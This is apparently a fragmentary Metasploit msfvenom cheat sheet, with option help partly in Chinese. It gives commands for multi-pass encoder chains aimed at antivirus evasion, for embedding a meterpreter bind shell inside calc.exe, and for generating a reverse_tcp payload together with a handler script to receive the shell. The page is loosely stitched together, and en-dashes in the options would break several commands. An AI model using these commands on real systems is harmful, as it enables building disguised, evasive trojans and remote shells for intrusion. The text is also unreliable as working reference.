MSFVENOM
Update date:
/usr/share/metasploit-framework/tools
cat payload_file.bin | ./msfvenom -p - -a x86 –platform win -e x86/shikata_ga_nai -f raw
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe
PAYLOAD windows/meterpreter/reverse_tcp
$MSFVENOM -p “$PAYLOAD” LHOST=”$IP” LPORT=”$PORT” EXITFUNC=thread -f raw |
$MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null |
$MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 –platform linux -f raw 2>/dev/null |
$MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 –platform win -f raw 2>/dev/null |
$MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 –platform win -f c > msf.c 2>/dev/null
github/metasploitavevasion
msfconsole
show payload
use linux/x64/exec
set cmd /bin/sh
generate -t py -b “/x00”
echo ""
echo 'use exploit/multi/handler' >> msfhandler.rc
echo "set payload $PAYLOAD" >> msfhandler.rc
echo "set LHOST $IP" >> msfhandler.rc
echo "set LPORT $PORT" >> msfhandler.rc
echo 'exploit' >> msfhandler.rc
$MSFCONSOLE -r msfhandler.rc
Options:
-p, –payload
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled
-f, –format
-e, –encoder [encoder] 指定需要使用的encoder(编码器)
-a, –arch
–platform
-s, –space
-b, –bad-chars 设定规避字符集,比如: '\x00\xff'
-i, –iterations
-c, –add-code
-x, –template
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out
-v, –var-name
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表
/usr/share/metasploit-framework/data/templates